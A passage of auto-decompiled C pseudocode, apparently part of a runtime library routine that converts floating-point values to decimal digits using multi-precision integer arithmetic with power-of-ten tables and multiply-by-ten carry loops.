    											_t1119 =  *((intOrPtr*)(_t1276 + _t1064 * 4 - 0x1d4));
    											_t1000 = _t999 - 1;
    											_t108 =  &_v1896;
    											 *_t108 = _v1896 & 0x00000000;
    											__eflags =  *_t108;
    											asm("bsr ecx, ecx");
    											_v1884 = _t1000;
    											_v1912 =  !_t1000;
    											if( *_t108 == 0) {
    												_t1120 = 0;
    												__eflags = 0;
    											} else {
    												_t1120 = _t1119 + 1;
    											}
    											_t1002 = 0x20;
    											_t1003 = _t1002 - _t1120;
    											_t1184 = _t1064 + _t1226;
    											__eflags = _v1876 - _t1003;
    											_v1892 = _t1184;
    											_t1004 = _t1003 & 0xffffff00 | _v1876 - _t1003 > 0x00000000;
    											__eflags = _t1184 - 0x73;
    											_v1865 = _t1004;
    											_t1121 = _t1120 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
    											__eflags = _t1184 - 0x73;
    											if(_t1184 != 0x73) {
    												L59:
    												_t1005 = 0;
    												__eflags = 0;
    											} else {
    												__eflags = _t1004;
    												if(_t1004 == 0) {
    													goto L59;
    												} else {
    													_t1005 = 1;
    												}
    											}
    											__eflags = _t1121;
    											if(_t1121 != 0) {
    												L81:
    												__eflags = 0;
    												_t1067 = 0x1cc;
    												_v1400 = 0;
    												_v472 = 0;
    												E0085AABF( &_v468, 0x1cc,  &_v1396, 0);
    												_t1279 =  &(_t1279[4]);
    											} else {
    												__eflags = _t1005;
    												if(_t1005 != 0) {
    													goto L81;
    												} else {
    													_t1122 = 0x72;
    													__eflags = _t1184 - _t1122;
    													if(_t1184 >= _t1122) {
    														_t1184 = _t1122;
    														_v1892 = _t1122;
    													}
    													_t1015 = _t1184;
    													_v1880 = _t1015;
    													__eflags = _t1184 - 0xffffffff;
    													if(_t1184 != 0xffffffff) {
    														_t1185 = _v1872;
    														_t1269 = _t1184 - _t1185;
    														__eflags = _t1269;
    														_t1126 =  &_v468 + _t1269 * 4;
    														_v1888 = _t1126;
    														while(1) {
    															__eflags = _t1015 - _t1185;
    															if(_t1015 < _t1185) {
    																break;
    															}
    															__eflags = _t1269 - _t1064;
    															if(_t1269 >= _t1064) {
    																_t1229 = 0;
    																__eflags = 0;
    															} else {
    																_t1229 =  *_t1126;
    															}
    															__eflags = _t1269 - 1 - _t1064;
    															if(_t1269 - 1 >= _t1064) {
    																_t1020 = 0;
    																__eflags = 0;
    															} else {
    																_t1020 =  *(_t1126 - 4);
    															}
    															_t1023 = _v1880;
    															_t1126 = _v1888 - 4;
    															_v1888 = _t1126;
    															 *(_t1276 + _t1023 * 4 - 0x1d0) = (_t1229 & _v1884) << _v1876 | (_t1020 & _v1912) >> _v1908;
    															_t1015 = _t1023 - 1;
    															_t1269 = _t1269 - 1;
    															_v1880 = _t1015;
    															__eflags = _t1015 - 0xffffffff;
    															if(_t1015 != 0xffffffff) {
    																_t1064 = _v472;
    																continue;
    															}
    															break;
    														}
    														_t1184 = _v1892;
    														_t1226 = _v1872;
    														_t1267 = 2;
    													}
    													__eflags = _t1226;
    													if(_t1226 != 0) {
    														__eflags = 0;
    														memset( &_v468, 0, _t1226 << 2);
    														_t1279 =  &(_t1279[3]);
    													}
    													__eflags = _v1865;
    													_t1067 = 0x1cc;
    													if(_v1865 == 0) {
    														_v472 = _t1184;
    													} else {
    														_v472 = _t1184 + 1;
    													}
    												}
    											}
    											_v1392 = _v1392 & 0x00000000;
    											_v1396 = _t1267;
    											_v1400 = 1;
    											_v936 = 1;
    											_push(4);
    										} else {
    											_t1130 = 0;
    											__eflags = 0;
    											while(1) {
    												__eflags =  *((intOrPtr*)(_t1276 + _t1130 - 0x570)) -  *((intOrPtr*)(_t1276 + _t1130 - 0x1d0));
    												if( *((intOrPtr*)(_t1276 + _t1130 - 0x570)) !=  *((intOrPtr*)(_t1276 + _t1130 - 0x1d0))) {
    													goto L53;
    												}
    												_t1130 = _t1130 + 4;
    												__eflags = _t1130 - 8;
    												if(_t1130 != 8) {
    													continue;
    												} else {
    													_t1026 = _v1872 + 2;
    													_t1027 = _t1026 & 0x0000001f;
    													_t1131 = 0x20;
    													_t1132 = _t1131 - _t1027;
    													_v1888 = _t1027;
    													_t1271 = _t1026 >> 5;
    													_v1876 = _t1271;
    													_v1908 = _t1132;
    													_t1030 = E0084DDE0(1, _t1132, 0);
    													_v1896 = _v1896 & 0x00000000;
    													_t1031 = _t1030 - 1;
    													__eflags = _t1031;
    													asm("bsr ecx, edi");
    													_v1884 = _t1031;
    													_v1912 =  !_t1031;
    													if(_t1031 == 0) {
    														_t1133 = 0;
    														__eflags = 0;
    													} else {
    														_t1133 = _t1132 + 1;
    													}
    													_t1033 = 0x20;
    													_t1034 = _t1033 - _t1133;
    													_t1187 = _t1271 + 2;
    													__eflags = _v1888 - _t1034;
    													_v1880 = _t1187;
    													_t1035 = _t1034 & 0xffffff00 | _v1888 - _t1034 > 0x00000000;
    													__eflags = _t1187 - 0x73;
    													_v1865 = _t1035;
    													_t1134 = _t1133 & 0xffffff00 | _t1187 - 0x00000073 > 0x00000000;
    													__eflags = _t1187 - 0x73;
    													if(_t1187 != 0x73) {
    														L28:
    														_t1036 = 0;
    														__eflags = 0;
    													} else {
    														__eflags = _t1035;
    														if(_t1035 == 0) {
    															goto L28;
    														} else {
    															_t1036 = 1;
    														}
    													}
    													__eflags = _t1134;
    													if(_t1134 != 0) {
    														L50:
    														__eflags = 0;
    														_t1067 = 0x1cc;
    														_v1400 = 0;
    														_v472 = 0;
    														E0085AABF( &_v468, 0x1cc,  &_v1396, 0);
    														_t1279 =  &(_t1279[4]);
    													} else {
    														__eflags = _t1036;
    														if(_t1036 != 0) {
    															goto L50;
    														} else {
    															_t1137 = 0x72;
    															__eflags = _t1187 - _t1137;
    															if(_t1187 >= _t1137) {
    																_t1187 = _t1137;
    																_v1880 = _t1137;
    															}
    															_t1138 = _t1187;
    															_v1892 = _t1138;
    															__eflags = _t1187 - 0xffffffff;
    															if(_t1187 != 0xffffffff) {
    																_t1188 = _v1876;
    																_t1273 = _t1187 - _t1188;
    																__eflags = _t1273;
    																_t1046 =  &_v468 + _t1273 * 4;
    																_v1872 = _t1046;
    																while(1) {
    																	__eflags = _t1138 - _t1188;
    																	if(_t1138 < _t1188) {
    																		break;
    																	}
    																	__eflags = _t1273 - _t1064;
    																	if(_t1273 >= _t1064) {
    																		_t1235 = 0;
    																		__eflags = 0;
    																	} else {
    																		_t1235 =  *_t1046;
    																	}
    																	__eflags = _t1273 - 1 - _t1064;
    																	if(_t1273 - 1 >= _t1064) {
    																		_t1048 = 0;
    																		__eflags = 0;
    																	} else {
    																		_t1048 =  *(_v1872 - 4);
    																	}
    																	_t1143 = _v1892;
    																	 *(_t1276 + _t1143 * 4 - 0x1d0) = (_t1048 & _v1912) >> _v1908 | (_t1235 & _v1884) << _v1888;
    																	_t1138 = _t1143 - 1;
    																	_t1273 = _t1273 - 1;
    																	_t1046 = _v1872 - 4;
    																	_v1892 = _t1138;
    																	_v1872 = _t1046;
    																	__eflags = _t1138 - 0xffffffff;
    																	if(_t1138 != 0xffffffff) {
    																		_t1064 = _v472;
    																		continue;
    																	}
    																	break;
    																}
    																_t1187 = _v1880;
    																_t1271 = _v1876;
    															}
    															__eflags = _t1271;
    															if(_t1271 != 0) {
    																__eflags = 0;
    																memset( &_v468, 0, _t1271 << 2);
    																_t1279 =  &(_t1279[3]);
    															}
    															__eflags = _v1865;
    															_t1067 = 0x1cc;
    															if(_v1865 == 0) {
    																_v472 = _t1187;
    															} else {
    																_v472 = _t1187 + 1;
    															}
    														}
    													}
    													_v1392 = _v1392 & 0x00000000;
    													_t1041 = 4;
    													__eflags = 1;
    													_v1396 = _t1041;
    													_v1400 = 1;
    													_v936 = 1;
    													_push(_t1041);
    												}
    												goto L52;
    											}
    											goto L53;
    										}
    										L52:
    										_push( &_v1396);
    										_push(_t1067);
    										_push( &_v932);
    										E0085AABF();
    										_t1282 =  &(_t1279[4]);
    									}
    									_t811 = _v1904;
    									_t1087 = 0xa;
    									_v1912 = _t1087;
    									__eflags = _t811;
    									if(_t811 < 0) {
    										_t812 =  ~_t811;
    										_t813 = _t812 / _t1087;
    										_v1880 = _t813;
    										_t1088 = _t812 % _t1087;
    										_v1884 = _t1088;
    										__eflags = _t813;
    										if(_t813 == 0) {
    											L249:
    											__eflags = _t1088;
    											if(_t1088 != 0) {
    												_t852 =  *(0x866a9c + _t1088 * 4);
    												_v1896 = _t852;
    												__eflags = _t852;
    												if(_t852 == 0) {
    													L260:
    													__eflags = 0;
    													_push(0);
    													_v472 = 0;
    													_v2408 = 0;
    													goto L261;
    												} else {
    													__eflags = _t852 - 1;
    													if(_t852 != 1) {
    														_t1099 = _v472;
    														__eflags = _t1099;
    														if(_t1099 != 0) {
    															_t1204 = 0;
    															_t1253 = 0;
    															__eflags = 0;
    															do {
    																_t1158 = _t852 *  *(_t1276 + _t1253 * 4 - 0x1d0) >> 0x20;
    																 *(_t1276 + _t1253 * 4 - 0x1d0) = _t852 *  *(_t1276 + _t1253 * 4 - 0x1d0) + _t1204;
    																_t852 = _v1896;
    																asm("adc edx, 0x0");
    																_t1253 = _t1253 + 1;
    																_t1204 = _t1158;
    																__eflags = _t1253 - _t1099;
    															} while (_t1253 != _t1099);
    															__eflags = _t1204;
    															if(_t1204 != 0) {
    																_t859 = _v472;
    																__eflags = _t859 - 0x73;
    																if(_t859 >= 0x73) {
    																	goto L260;
    																} else {
    																	 *(_t1276 + _t859 * 4 - 0x1d0) = _t1204;
    																	_v472 = _v472 + 1;
    																}
    															}
    														}
    													}
    												}
    											}
    										} else {
    											do {
    												__eflags = _t813 - 0x26;
    												if(_t813 > 0x26) {
    													_t813 = 0x26;
    												}
    												_t1100 =  *(0x866a06 + _t813 * 4) & 0x000000ff;
    												_v1872 = _t813;
    												_v1400 = ( *(0x866a06 + _t813 * 4) & 0x000000ff) + ( *(0x866a07 + _t813 * 4) & 0x000000ff);
    												E0084E920(_t1100 << 2,  &_v1396, 0, _t1100 << 2);
    												_t870 = E0084EA80( &(( &_v1396)[_t1100]), 0x866100 + ( *(0x866a04 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x866a07 + _t813 * 4) & 0x000000ff) << 2);
    												_t1101 = _v1400;
    												_t1282 =  &(_t1282[6]);
    												_v1892 = _t1101;
    												__eflags = _t1101 - 1;
    												if(_t1101 > 1) {
    													__eflags = _v472 - 1;
    													if(_v472 > 1) {
    														__eflags = _t1101 - _v472;
    														_t1207 =  &_v1396;
    														_t871 = _t870 & 0xffffff00 | _t1101 - _v472 > 0x00000000;
    														__eflags = _t871;
    														if(_t871 != 0) {
    															_t1159 =  &_v468;
    														} else {
    															_t1207 =  &_v468;
    															_t1159 =  &_v1396;
    														}
    														_v1908 = _t1159;
    														__eflags = _t871;
    														if(_t871 == 0) {
    															_t1101 = _v472;
    														}
    														_v1876 = _t1101;
    														__eflags = _t871;
    														if(_t871 != 0) {
    															_v1892 = _v472;
    														}
    														_t1160 = 0;
    														_t1255 = 0;
    														_v1864 = 0;
    														__eflags = _t1101;
    														if(_t1101 == 0) {
    															L243:
    															_v472 = _t1160;
    															_t873 = _t1160 << 2;
    															__eflags = _t873;
    															_push(_t873);
    															_t874 =  &_v1860;
    															goto L244;
    														} else {
    															_t1208 = _t1207 -  &_v1860;
    															__eflags = _t1208;
    															_v1928 = _t1208;
    															do {
    																_t881 =  *(_t1276 + _t1208 + _t1255 * 4 - 0x740);
    																_v1896 = _t881;
    																__eflags = _t881;
    																if(_t881 != 0) {
    																	_t882 = 0;
    																	_t1209 = 0;
    																	_t1102 = _t1255;
    																	_v1888 = 0;
    																	__eflags = _v1892;
    																	if(_v1892 == 0) {
    																		L240:
    																		__eflags = _t1102 - 0x73;
    																		if(_t1102 == 0x73) {
    																			goto L258;
    																		} else {
    																			_t1208 = _v1928;
    																			_t1101 = _v1876;
    																			goto L242;
    																		}
    																	} else {
    																		while(1) {
    																			__eflags = _t1102 - 0x73;
    																			if(_t1102 == 0x73) {
    																				goto L235;
    																			}
    																			__eflags = _t1102 - _t1160;
    																			if(_t1102 == _t1160) {
    																				 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) & 0x00000000;
    																				_t894 = _t882 + 1 + _t1255;
    																				__eflags = _t894;
    																				_v1864 = _t894;
    																				_t882 = _v1888;
    																			}
    																			_t889 =  *(_v1908 + _t882 * 4);
    																			asm("adc edx, 0x0");
    																			 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) + _t889 * _v1896 + _t1209;
    																			asm("adc edx, 0x0");
    																			_t882 = _v1888 + 1;
    																			_t1102 = _t1102 + 1;
    																			_v1888 = _t882;
    																			_t1209 = _t889 * _v1896 >> 0x20;
    																			_t1160 = _v1864;
    																			__eflags = _t882 - _v1892;
    																			if(_t882 != _v1892) {
    																				continue;
    																			} else {
    																				goto L235;
    																			}
    																			while(1) {
    																				L235:
    																				__eflags = _t1209;
    																				if(_t1209 == 0) {
    																					goto L240;
    																				}
    																				__eflags = _t1102 - 0x73;
    																				if(_t1102 == 0x73) {
    																					goto L258;
    																				} else {
    																					__eflags = _t1102 - _t1160;
    																					if(_t1102 == _t1160) {
    																						_t558 = _t1276 + _t1102 * 4 - 0x740;
    																						 *_t558 =  *(_t1276 + _t1102 * 4 - 0x740) & 0x00000000;
    																						__eflags =  *_t558;
    																						_t564 = _t1102 + 1; // 0x1
    																						_v1864 = _t564;
    																					}
    																					_t887 = _t1209;
    																					_t1209 = 0;
    																					 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) + _t887;
    																					_t1160 = _v1864;
    																					asm("adc edi, edi");
    																					_t1102 = _t1102 + 1;
    																					continue;
    																				}
    																				goto L246;
    																			}
    																			goto L240;
    																		}
    																		goto L235;
    																	}
    																} else {
    																	__eflags = _t1255 - _t1160;
    																	if(_t1255 == _t1160) {
    																		 *(_t1276 + _t1255 * 4 - 0x740) =  *(_t1276 + _t1255 * 4 - 0x740) & _t881;
    																		_t526 = _t1255 + 1; // 0x1
    																		_t1160 = _t526;
    																		_v1864 = _t1160;
    																	}
    																	goto L242;
    																}
    																goto L246;
    																L242:
    																_t1255 = _t1255 + 1;
    																__eflags = _t1255 - _t1101;
    															} while (_t1255 != _t1101);
    															goto L243;
    														}
    													} else {
    														_t1210 = _v468;
    														_v472 = _t1101;
    														E0085AABF( &_v468, _t1067,  &_v1396, _t1101 << 2);
    														_t1282 =  &(_t1282[4]);
    														__eflags = _t1210;
    														if(_t1210 == 0) {
    															goto L203;
    														} else {
    															__eflags = _t1210 - 1;
    															if(_t1210 == 1) {
    																goto L245;
    															} else {
    																__eflags = _v472;
    																if(_v472 == 0) {
    																	goto L245;
    																} else {
    																	_t1103 = 0;
    																	_v1896 = _v472;
    																	_t1256 = 0;
    																	__eflags = 0;
    																	do {
    																		_t903 = _t1210;
    																		_t1161 = _t903 *  *(_t1276 + _t1256 * 4 - 0x1d0) >> 0x20;
    																		 *(_t1276 + _t1256 * 4 - 0x1d0) = _t903 *  *(_t1276 + _t1256 * 4 - 0x1d0) + _t1103;
    																		asm("adc edx, 0x0");
    																		_t1256 = _t1256 + 1;
    																		_t1103 = _t1161;
    																		__eflags = _t1256 - _v1896;
    																	} while (_t1256 != _v1896);
    																	goto L208;
    																}
    															}
    														}
    													}
    												} else {
    													_t1211 = _v1396;
    													__eflags = _t1211;
    													if(_t1211 != 0) {
    														__eflags = _t1211 - 1;
    														if(_t1211 == 1) {
    															goto L245;
    														} else {
    															__eflags = _v472;
    															if(_v472 == 0) {
    																goto L245;
    															} else {
    																_t1104 = 0;
    																_v1896 = _v472;
    																_t1257 = 0;
    																__eflags = 0;
    																do {
    																	_t908 = _t1211;
    																	_t1162 = _t908 *  *(_t1276 + _t1257 * 4 - 0x1d0) >> 0x20;
    																	 *(_t1276 + _t1257 * 4 - 0x1d0) = _t908 *  *(_t1276 + _t1257 * 4 - 0x1d0) + _t1104;
    																	asm("adc edx, 0x0");
    																	_t1257 = _t1257 + 1;
    																	_t1104 = _t1162;
    																	__eflags = _t1257 - _v1896;
    																} while (_t1257 != _v1896);
    																L208:
    																__eflags = _t1103;
    																if(_t1103 == 0) {
    																	goto L245;
    																} else {
    																	_t906 = _v472;
    																	__eflags = _t906 - 0x73;
    																	if(_t906 >= 0x73) {
    																		L258:
    																		_v2408 = 0;
    																		_v472 = 0;
    																		E0085AABF( &_v468, _t1067,  &_v2404, 0);
    																		_t1282 =  &(_t1282[4]);
    																		_t877 = 0;
    																	} else {
    																		 *(_t1276 + _t906 * 4 - 0x1d0) = _t1103;
    																		_v472 = _v472 + 1;
    																		goto L245;
    																	}
    																}
    															}
    														}
    													} else {
    														L203:
    														_v2408 = 0;
    														_v472 = 0;
    														_push(0);
    														_t874 =  &_v2404;
    														L244:
    														_push(_t874);
    														_push(_t1067);
    														_push( &_v468);
    														E0085AABF();
    														_t1282 =  &(_t1282[4]);
    														L245:
    														_t877 = 1;
    													}
    												}
    												L246:
    												__eflags = _t877;
    												if(_t877 == 0) {
    													_v2408 = _v2408 & 0x00000000;
    													_v472 = _v472 & 0x00000000;
    													_push(0);
    													L261:
    													_push( &_v2404);
    													_t855 =  &_v468;
    													goto L262;
    												} else {
    													goto L247;
    												}
    												goto L263;
    												L247:
    												_t813 = _v1880 - _v1872;
    												__eflags = _t813;
    												_v1880 = _t813;
    											} while (_t813 != 0);
    											_t1088 = _v1884;
    											goto L249;
    										}
    									} else {
    										_t911 = _t811 / _t1087;
    										_v1908 = _t911;
    										_t1105 = _t811 % _t1087;
    										_v1896 = _t1105;
    										__eflags = _t911;
    										if(_t911 == 0) {
    											L184:
    											__eflags = _t1105;
    											if(_t1105 != 0) {
    												_t1212 =  *(0x866a9c + _t1105 * 4);
    												__eflags = _t1212;
    												if(_t1212 != 0) {
    													__eflags = _t1212 - 1;
    													if(_t1212 != 1) {
    														_t912 = _v936;
    														_v1896 = _t912;
    														__eflags = _t912;
    														if(_t912 != 0) {
    															_t1258 = 0;
    															_t1106 = 0;
    															__eflags = 0;
    															do {
    																_t913 = _t1212;
    																_t1166 = _t913 *  *(_t1276 + _t1106 * 4 - 0x3a0) >> 0x20;
    																 *(_t1276 + _t1106 * 4 - 0x3a0) = _t913 *  *(_t1276 + _t1106 * 4 - 0x3a0) + _t1258;
    																asm("adc edx, 0x0");
    																_t1106 = _t1106 + 1;
    																_t1258 = _t1166;
    																__eflags = _t1106 - _v1896;
    															} while (_t1106 != _v1896);
    															__eflags = _t1258;
    															if(_t1258 != 0) {
    																_t916 = _v936;
    																__eflags = _t916 - 0x73;
    																if(_t916 >= 0x73) {
    																	goto L186;
    																} else {
    																	 *(_t1276 + _t916 * 4 - 0x3a0) = _t1258;
    																	_v936 = _v936 + 1;
    																}
    															}
    														}
    													}
    												} else {
    													L186:
    													_v2408 = 0;
    													_v936 = 0;
    													_push(0);
    													goto L190;
    												}
    											}
    										} else {
    											do {
    												__eflags = _t911 - 0x26;
    												if(_t911 > 0x26) {
    													_t911 = 0x26;
    												}
    												_t1107 =  *(0x866a06 + _t911 * 4) & 0x000000ff;
    												_v1888 = _t911;
    												_v1400 = ( *(0x866a06 + _t911 * 4) & 0x000000ff) + ( *(0x866a07 + _t911 * 4) & 0x000000ff);
    												E0084E920(_t1107 << 2,  &_v1396, 0, _t1107 << 2);
    												_t929 = E0084EA80( &(( &_v1396)[_t1107]), 0x866100 + ( *(0x866a04 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x866a07 + _t911 * 4) & 0x000000ff) << 2);
    												_t1108 = _v1400;
    												_t1282 =  &(_t1282[6]);
    												_v1892 = _t1108;
    												__eflags = _t1108 - 1;
    												if(_t1108 > 1) {
    													__eflags = _v936 - 1;
    													if(_v936 > 1) {
    														__eflags = _t1108 - _v936;
    														_t1215 =  &_v1396;
    														_t930 = _t929 & 0xffffff00 | _t1108 - _v936 > 0x00000000;
    														__eflags = _t930;
    														if(_t930 != 0) {
    															_t1167 =  &_v932;
    														} else {
    															_t1215 =  &_v932;
    															_t1167 =  &_v1396;
    														}
    														_v1876 = _t1167;
    														__eflags = _t930;
    														if(_t930 == 0) {
    															_t1108 = _v936;
    														}
    														_v1880 = _t1108;
    														__eflags = _t930;
    														if(_t930 != 0) {
    															_v1892 = _v936;
    														}
    														_t1168 = 0;
    														_t1260 = 0;
    														_v1864 = 0;
    														__eflags = _t1108;
    														if(_t1108 == 0) {
    															L177:
    															_v936 = _t1168;
    															_t932 = _t1168 << 2;
    															__eflags = _t932;
    															goto L178;
    														} else {
    															_t1216 = _t1215 -  &_v1860;
    															__eflags = _t1216;
    															_v1928 = _t1216;
    															do {
    																_t940 =  *(_t1276 + _t1216 + _t1260 * 4 - 0x740);
    																_v1884 = _t940;
    																__eflags = _t940;
    																if(_t940 != 0) {
    																	_t941 = 0;
    																	_t1217 = 0;
    																	_t1109 = _t1260;
    																	_v1872 = 0;
    																	__eflags = _v1892;
    																	if(_v1892 == 0) {
    																		L174:
    																		__eflags = _t1109 - 0x73;
    																		if(_t1109 == 0x73) {
    																			goto L187;
    																		} else {
    																			_t1216 = _v1928;
    																			_t1108 = _v1880;
    																			goto L176;
    																		}
    																	} else {
    																		while(1) {
    																			__eflags = _t1109 - 0x73;
    																			if(_t1109 == 0x73) {
    																				goto L169;
    																			}
    																			__eflags = _t1109 - _t1168;
    																			if(_t1109 == _t1168) {
    																				 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) & 0x00000000;
    																				_t953 = _t941 + 1 + _t1260;
    																				__eflags = _t953;
    																				_v1864 = _t953;
    																				_t941 = _v1872;
    																			}
    																			_t948 =  *(_v1876 + _t941 * 4);
    																			asm("adc edx, 0x0");
    																			 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) + _t948 * _v1884 + _t1217;
    																			asm("adc edx, 0x0");
    																			_t941 = _v1872 + 1;
    																			_t1109 = _t1109 + 1;
    																			_v1872 = _t941;
    																			_t1217 = _t948 * _v1884 >> 0x20;
    																			_t1168 = _v1864;
    																			__eflags = _t941 - _v1892;
    																			if(_t941 != _v1892) {
    																				continue;
    																			} else {
    																				goto L169;
    																			}
    																			while(1) {
    																				L169:
    																				__eflags = _t1217;
    																				if(_t1217 == 0) {
    																					goto L174;
    																				}
    																				__eflags = _t1109 - 0x73;
    																				if(_t1109 == 0x73) {
    																					L187:
    																					__eflags = 0;
    																					_v2408 = 0;
    																					_v936 = 0;
    																					_push(0);
    																					_t943 =  &_v2404;
    																					goto L188;
    																				} else {
    																					__eflags = _t1109 - _t1168;
    																					if(_t1109 == _t1168) {
    																						_t370 = _t1276 + _t1109 * 4 - 0x740;
    																						 *_t370 =  *(_t1276 + _t1109 * 4 - 0x740) & 0x00000000;
    																						__eflags =  *_t370;
    																						_t376 = _t1109 + 1; // 0x1
    																						_v1864 = _t376;
    																					}
    																					_t946 = _t1217;
    																					_t1217 = 0;
    																					 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) + _t946;
    																					_t1168 = _v1864;
    																					asm("adc edi, edi");
    																					_t1109 = _t1109 + 1;
    																					continue;
    																				}
    																				goto L181;
    																			}
    																			goto L174;
    																		}
    																		goto L169;
    																	}
    																} else {
    																	__eflags = _t1260 - _t1168;
    																	if(_t1260 == _t1168) {
    																		 *(_t1276 + _t1260 * 4 - 0x740) =  *(_t1276 + _t1260 * 4 - 0x740) & _t940;
    																		_t338 = _t1260 + 1; // 0x1
    																		_t1168 = _t338;
    																		_v1864 = _t1168;
    																	}
    																	goto L176;
    																}
    																goto L181;
    																L176:
    																_t1260 = _t1260 + 1;
    																__eflags = _t1260 - _t1108;
    															} while (_t1260 != _t1108);
    															goto L177;
    														}
    													} else {
    														_t1218 = _v932;
    														_v936 = _t1108;
    														E0085AABF( &_v932, _t1067,  &_v1396, _t1108 << 2);
    														_t1282 =  &(_t1282[4]);
    														__eflags = _t1218;
    														if(_t1218 != 0) {
    															__eflags = _t1218 - 1;
    															if(_t1218 == 1) {
    																goto L180;
    															} else {
    																__eflags = _v936;
    																if(_v936 == 0) {
    																	goto L180;
    																} else {
    																	_t1110 = 0;
    																	_v1884 = _v936;
    																	_t1261 = 0;
    																	__eflags = 0;
    																	do {
    																		_t961 = _t1218;
    																		_t1169 = _t961 *  *(_t1276 + _t1261 * 4 - 0x3a0) >> 0x20;
    																		 *(_t1276 + _t1261 * 4 - 0x3a0) = _t961 *  *(_t1276 + _t1261 * 4 - 0x3a0) + _t1110;
    																		asm("adc edx, 0x0");
    																		_t1261 = _t1261 + 1;
    																		_t1110 = _t1169;
    																		__eflags = _t1261 - _v1884;
    																	} while (_t1261 != _v1884);
    																	goto L149;
    																}
    															}
    														} else {
    															_v1400 = 0;
    															_v936 = 0;
    															_push(0);
    															_t933 =  &_v1396;
    															goto L179;
    														}
    													}
    												} else {
    													_t1219 = _v1396;
    													__eflags = _t1219;
    													if(_t1219 != 0) {
    														__eflags = _t1219 - 1;
    														if(_t1219 == 1) {
    															goto L180;
    														} else {
    															__eflags = _v936;
    															if(_v936 == 0) {
    																goto L180;
    															} else {
    																_t1111 = 0;
    																_v1884 = _v936;
    																_t1262 = 0;
    																__eflags = 0;
    																do {
    																	_t968 = _t1219;
    																	_t1170 = _t968 *  *(_t1276 + _t1262 * 4 - 0x3a0) >> 0x20;
    																	 *(_t1276 + _t1262 * 4 - 0x3a0) = _t968 *  *(_t1276 + _t1262 * 4 - 0x3a0) + _t1111;
    																	asm("adc edx, 0x0");
    																	_t1262 = _t1262 + 1;
    																	_t1111 = _t1170;
    																	__eflags = _t1262 - _v1884;
    																} while (_t1262 != _v1884);
    																L149:
    																__eflags = _t1110;
    																if(_t1110 == 0) {
    																	goto L180;
    																} else {
    																	_t964 = _v936;
    																	__eflags = _t964 - 0x73;
    																	if(_t964 < 0x73) {
    																		 *(_t1276 + _t964 * 4 - 0x3a0) = _t1110;
    																		_v936 = _v936 + 1;
    																		goto L180;
    																	} else {
    																		_v1400 = 0;
    																		_v936 = 0;
    																		_push(0);
    																		_t943 =  &_v1396;
    																		L188:
    																		_push(_t943);
    																		_push(_t1067);
    																		_push( &_v932);
    																		E0085AABF();
    																		_t1282 =  &(_t1282[4]);
    																		_t936 = 0;
    																	}
    																}
    															}
    														}
    													} else {
    														_t932 = 0;
    														_v1864 = 0;
    														_v936 = 0;
    														L178:
    														_push(_t932);
    														_t933 =  &_v1860;
    														L179:
    														_push(_t933);
    														_push(_t1067);
    														_push( &_v932);
    														E0085AABF();
    														_t1282 =  &(_t1282[4]);
    														L180:
    														_t936 = 1;
    													}
    												}
    												L181:
    												__eflags = _t936;
    												if(_t936 == 0) {
    													_v2408 = _v2408 & 0x00000000;
    													_t404 =  &_v936;
    													 *_t404 = _v936 & 0x00000000;
    													__eflags =  *_t404;
    													_push(0);
    													L190:
    													_push( &_v2404);
    													_t855 =  &_v932;
    													L262:
    													_push(_t1067);
    													_push(_t855);
    													E0085AABF();
    													_t1282 =  &(_t1282[4]);
    												} else {
    													goto L182;
    												}
    												goto L263;
    												L182:
    												_t911 = _v1908 - _v1888;
    												__eflags = _t911;
    												_v1908 = _t911;
    											} while (_t911 != 0);
    											_t1105 = _v1896;
    											goto L184;
    										}
    									}
    									L263:
    									_t1199 = _v1920;
    									_t1248 = _t1199;
    									_t1089 = _v472;
    									_v1872 = _t1248;
    									__eflags = _t1089;
    									if(_t1089 != 0) {
    										_t1252 = 0;
    										_t1203 = 0;
    										__eflags = 0;
    										do {
    											_t844 =  *(_t1276 + _t1203 * 4 - 0x1d0);
    											_t1156 = 0xa;
    											_t1157 = _t844 * _t1156 >> 0x20;
    											 *(_t1276 + _t1203 * 4 - 0x1d0) = _t844 * _t1156 + _t1252;
    											asm("adc edx, 0x0");
    											_t1203 = _t1203 + 1;
    											_t1252 = _t1157;
    											__eflags = _t1203 - _t1089;
    										} while (_t1203 != _t1089);
    										_v1896 = _t1252;
    										__eflags = _t1252;
    										_t1248 = _v1872;
    										if(_t1252 != 0) {
    											_t1098 = _v472;
    											__eflags = _t1098 - 0x73;
    											if(_t1098 >= 0x73) {
    												__eflags = 0;
    												_v2408 = 0;
    												_v472 = 0;
    												E0085AABF( &_v468, _t1067,  &_v2404, 0);
    												_t1282 =  &(_t1282[4]);
    											} else {
    												 *(_t1276 + _t1098 * 4 - 0x1d0) = _t1157;
    												_v472 = _v472 + 1;
    											}
    										}
    										_t1199 = _t1248;
    									}
    									_t816 = E0085C100( &_v472,  &_v936);
    									_t1149 = 0xa;
    									__eflags = _t816 - _t1149;
    									if(_t816 != _t1149) {
    										__eflags = _t816;
    										if(_t816 != 0) {
    											_t817 = _t816 + 0x30;
    											__eflags = _t817;
    											_t1248 = _t1199 + 1;
    											 *_t1199 = _t817;
    											_v1872 = _t1248;
    											goto L282;
    										} else {
    											_t818 = _v1904 - 1;
    										}
    									} else {
    										_v1904 = _v1904 + 1;
    										_t1248 = _t1199 + 1;
    										_t835 = _v936;
    										 *_t1199 = 0x31;
    										_v1872 = _t1248;
    										__eflags = _t835;
    										if(_t835 != 0) {
    											_t1202 = 0;
    											_t1251 = _t835;
    											_t1097 = 0;
    											__eflags = 0;
    											do {
    												_t836 =  *(_t1276 + _t1097 * 4 - 0x3a0);
    												 *(_t1276 + _t1097 * 4 - 0x3a0) = _t836 * _t1149 + _t1202;
    												asm("adc edx, 0x0");
    												_t1097 = _t1097 + 1;
    												_t1202 = _t836 * _t1149 >> 0x20;
    												_t1149 = 0xa;
    												__eflags = _t1097 - _t1251;
    											} while (_t1097 != _t1251);
    											_t1248 = _v1872;
    											__eflags = _t1202;
